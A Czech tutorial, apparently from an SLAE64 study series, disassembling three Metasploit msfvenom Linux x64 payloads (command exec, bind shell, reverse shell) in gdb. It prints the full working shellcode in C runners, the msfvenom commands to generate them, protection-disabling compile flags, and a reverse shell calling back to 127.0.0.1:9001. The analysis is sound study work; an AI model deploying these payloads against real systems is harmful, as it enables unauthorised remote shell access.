Analýza vybraných 64bitových MSFvenom shellcodů

V pátém textu této 64bitové série budou analyzovány 3 vybrané shellcody vygenerované pomocí msfvenom pro linux/x64. K analýze bude použito gdb.

Všechny dostupné payloady v msfvenom můžeme vidět pomocí:

 • msfvenom ––list payloads | grep linux/x64

Za účelem analýzy byly vybrány následující payloady:

 • linux/x64/exec
 • linux/x64/shell_bind_tcp
 • linux/x64/shell_reverse_tcp

linux/x64/exec:

Nejdřív ze všeho potřebujeme vědět, jaké jsou požadované nastavení pro vygenerování tohoto shellcodu:

 • msfvenom -p linux/x64/exec ––list-options

Je zde pouze jedno požadované nastavení a to „CMD“. V našem případě použijeme whoami.

Vytvoříme shellcode v C:

 • msfvenom -p linux/x64/exec CMD=whoami -f c

Poté vložíme do C skriptu, spustíme a spočítáme délku shellcodu:

#include<stdio.h>
#include<string.h>
 
unsigned char code[] = \
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53"
"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x07\x00"
"\x00\x00\x77\x68\x6f\x61\x6d\x69\x00\x56\x57\x48\x89\xe6\x0f"
"\x05";
 
main()
{
printf("Shellcode Lenght: %d\n", strlen(code));
 
int (*ret)() = (int(*)())code;
 
ret();
 
}

Zkompilujeme:

 • gcc -fno-stack-protector -z execstack shellcode-exec.c -o shellcode-exec

Jak můžeme vidět, shellcode funguje. Nyní jej můžeme analyzovat například pomocí GDB:

 • gdb ./shellcode-exec -q -tui
 • set disassembly-flavor intel
 • layout a
 • layout r
 • break *&code
 • run
push 0x3b               ; syscall 59 = execve()
pop rax                ; RAX = 59                         
cdq                  ; RDX = 0                           
movabs rbx,0x68732f6e69622f      ; "hs/nib/"                         
push rbx               ; push in the stack                         
mov rdi,rsp              ; RDI -> RSP ("hs/nib/")                         
push 0x632d              ; "c-"                          
mov rsi,rsp              ; RSI -> RSP ("c-")
push rdx               ; RDX = 0                         call 0x555555558087          ; storing the command "whoami" into the stack                         
push rsi               ; RSI -> stack
push rdi               ; RDI -> stack
mov rsi, rsp             ; RSI (/bin/bash -c whoami) -> stack                    
syscallMůžeme vidět náš string “\x69\x6d\x61\x6f\x68\x77” = “whoami”.

 • echo -ne ‘\x56\x57\x48\x89\xe6’ | ndisasm -b 64 –

linux/x64/shell_bind_tcp:

Všechny povinné možnosti nastavení můžeme vidět pomocí:

 • msfvenom -p linux/x64/shell_bind_tcp –list-options

Je zde pouze jedno povinné nastavení a to „LPORT“.

Shellcode v C si můžeme vytvořit pomocí:

 • msfvenom -p linux/x64/shell_bind_tcp LPORT=9001 -f c

Potom můžeme pomocí jednoduchého C skriptu spočítat délku shellcode:

#include<stdio.h>
#include<string.h>
 
unsigned char code[] = \
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x52"
"\xc7\x04\x24\x02\x00\x23\x29\x48\x89\xe6\x6a\x10\x5a\x6a\x31"
"\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f"
"\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
"\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";
 
main()
{
printf("Shellcode Lenght: %d\n", strlen(code));
 
int (*ret)() = (int(*)())code;
 
ret();
 
}

Následně zkompilujeme C script a spustíme jej:

 • gcc -fno-stack-protector -z execstack shellcode-bind.c -o shellcode-bind

Jak můžeme vidět na screenu výše, shellcode byl úspěšně spuštěn. Analyzovat jej můžeme například pomocí ndisasm a gdb:

 • msfvenom -p linux/x64/shell_bind_tcp LHOST=127.0.0.1 LPORT=9001 | ndisasm -b 64 –
 • gdb ./shellcode-bind -q -tui
 • set disassembly-flavor intel
 • layout a
 • layout r
 • break *&code
 • run

push byte +0x29       ; = 41
pop rax           ; syscall = socket()
cdq             ; RDX = 0
push byte +0x2        ; 
pop rdi           ; AF_INET = 2
push byte +0x1        ; 
pop rsi           ; SOCKET_STREAM = 1
syscall           ; executing syscall socket()
xchg rax, rdi        ; saving results for later use
push rdx           ; 
mov dword [rsp], 0x29230002 ; Doubleword = 1. port = 9001 (0x2923) 2. AF_INET = 2 (0x02)
mov rsi, rsp         ; move dword -> RSI
push byte +0x10       ; address length into RDX
pop rdx
push byte +0x31       ; = 49
pop rax           ; syscall = bind()
syscall           ; executing syscall bind()
push byte +0x32       ; = 50
pop rax           ; syscall listen()
syscall           ; executing syscall listen()
xor rsi, rsi         ; RSI = 0
push byte +0x2b       ; = 43
pop rax           ; syscall = accept()
syscall           ; executing syscall accept()
xchg rax, rdi        ; saving results for later use
push byte +0x3
pop rsi           ; RSI loop = 3
dec rsi           ; RSI minus 1 <---------<-------------<-|
push byte +0x21       ; = 33                 |
pop rax           ; syscall dup2()            |
syscall           ; executing syscall dup2()       |
jne 0x555555558093      ; JNE -> loop to instruction dec rsi >->|
push byte +0x3b       ; = 59
pop rax           ; syscall execve()
cdq
mov rbx, 0x68732f6e69622f  ; "hs/nib/"
push rbx           ; 
mov rdi, rsp         ; RSI -> RDI -> pathname = /bin/sh,0x0 
push rdx           ; RDX = 0
push rdi
mov rsi, rsp
syscall           ; executing syscall execve()

mov dword [rsp], 0x29230002  ; Doubleword = 1. port = 9001 (0x2923) 2. AF_INET = 2 (0x02)

RSI Loop

 • Socket():
  • less /usr/include/x86_64-linux-gnu/asm/unistd_64.h
   • socket() = 41
  • man socket
   • RAX:
    • socket() = 41
   • RDI:
    • int domain
    • PF_INET = 2
   • RSI:
    • int type
    • SOCK_STREAM = 1
   • RDX:
    • int protocol
    • IPPROTO_IP = 0
 • Bind():
  • less /usr/include/x86_64-linux-gnu/asm/unistd_64.h
   • bind = 49
  • man bind
   • RAX:
    • bind() = 49
   • RDI:
    • int sockfd
    • reference to socket (previous storing RAX into RDI)
   • RSI:
    • const struct sockaddr *addr
    • AF_INET => 2
    • Port number => 9001 decimal = 2329 hex => little endian = 0x2923
    • Internet address => 0.0.0.0
    • 0
   • RDX:
    • socklen_t addrlen
    • pointer to location on the stack of the sockaddr struct we are going to create
 • Listen():
  • less /usr/include/x86_64-linux-gnu/asm/unistd_64.h
   • listen = 50
  • man listen
   • RAX:
    • listen() = 50
   • RDI:
    • int sockfd
    • reference of stored RDI (socket())
   • RSI:
    • int backlog
    • = 0
 • Accept():
  • less /usr/include/x86_64-linux-gnu/asm/unistd_64.h
   • accept = 43
  • man accept
   • RAX:
    • Accept()
   • RDI:
    • int sockfd
    • reference on stored RDI
   • RSI:
    • struct sockaddr *addr = 0
   • RDX:
    • socklen_t *addrlen = 0
 • Dup2():
  • less /usr/include/x86_64-linux-gnu/asm/unistd_64.h
   • dup2 = 33
  • man dup2
   • RAX:
    • dup2()
   • RDI:
    • int oldfd
    • already in clientid
   • RSI:
    • int newfd
    • we will need loop for 3x into RSI
    • loop 3,2,1
 • Execve():
  • less /usr/include/x86_64-linux-gnu/asm/unistd_64.h
   • execve() = 59
  • man execve
   • RAX:
    • execve = 59
   • RDI:
    • const char *pathname
    • /bin/sh,0x0
   • RSI:
    • const char *const argv[]
    • address of /bin/sh, 0x0000000000000000
   • RDX:
    • const char *const envp[]
    • 0x0000000000000000
 • linux/x64/shell_reverse_tcp:

Všechny povinné možnosti nastavení můžeme vidět pomocí:

 • msfvenom -p linux/x64/shell_reverse_tcp ––list-option

Jsou zde dvě povinné nastavení a to „LPORT“ a „LHOST“.

Shellcode v C si můžeme vytvořit pomocí:

 • msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=9001 -f c

Potom můžeme pomocí jednoduchého C skriptu spočítat délku shellcode:

#include<stdio.h>
#include<string.h>
 
unsigned char code[] = \
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
"\xb9\x02\x00\x23\x29\x7f\x00\x00\x01\x51\x48\x89\xe6\x6a\x10"
"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";
 
main()
{
printf("Shellcode Lenght: %d\n", strlen(code));
 
int (*ret)() = (int(*)())code;
 
ret();
 
}

Následně zkompilujeme C script a spustíme jej:

 • gcc -fno-stack-protector -z execstack shellcode-reverse.c -o shellcode-reverse

Jak můžeme vidět na screenu výše, shellcode funguje. Nyní můžeme shellcode analyzovat pomocí gdb:

 • msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=9001 | ndisasm -b 64 –
 • gdb ./shellcode-reverse -q -tui
 • set disassembly-flavor intel
 • layout a
 • layout r
 • break *&code
 • run

push byte +0x29        ; = 41
pop rax            ; syscall = socket()
cdq              ; RDX = 0
push byte +0x2        ; 
pop rdi            ; AF_INET = 2
push byte +0x1        ;
pop rsi            ; SOCKET_STREAM = 1
syscall            ; executing syscall socket()
xchg rax,rdi         ; RDI for later use
mov rcx,0x100007f29230002   ; 100007f = IP 127.0.0.1, 2923 = port 9001, 02 = AF_INET
push rcx           ; 
mov rsi,rsp          ; 
push byte +0x10        ;
pop rdx            ; address length into RDX
push byte +0x2a        ;
pop rax            ; RAX = 42
syscall            ; syscall = connect()
push byte +0x3        ; 
pop rsi            ; RSI = 3
dec rsi            ; RSI minus 1 <-------<-----<-----|
push byte +0x21        ; = 33              |
pop rax            ; syscall dup2()         |
syscall            ; executing syscall dup2()    |
jnz 0x27           ; JNE -> loop to --------->------>|      
push byte +0x3b        ; = 59
pop rax            ; syscall execve()
cdq              ; RDX = 0
mov rbx,0x68732f6e69622f   ; = "hs/nib/"
push rbx           ;
mov rdi,rsp          ; RSI -> RDI -> pathname = /bin/sh,0x0
push rdx           ;
push rdi           ;
mov rsi,rsp          ;
syscall            ; executing syscall execve()

100007f = IP 127.0.0.1, 2923 = port 9001, 02 = AF_INET

Connect() = (3, {sa_family=AF_INET, sin_port=htons(9001), sin_addr=inet_addr(“127.0.0.1”)}, 16)

Všechny použité soubory můžete nalézt zde: https://github.com/Pal1Sec/SLAE64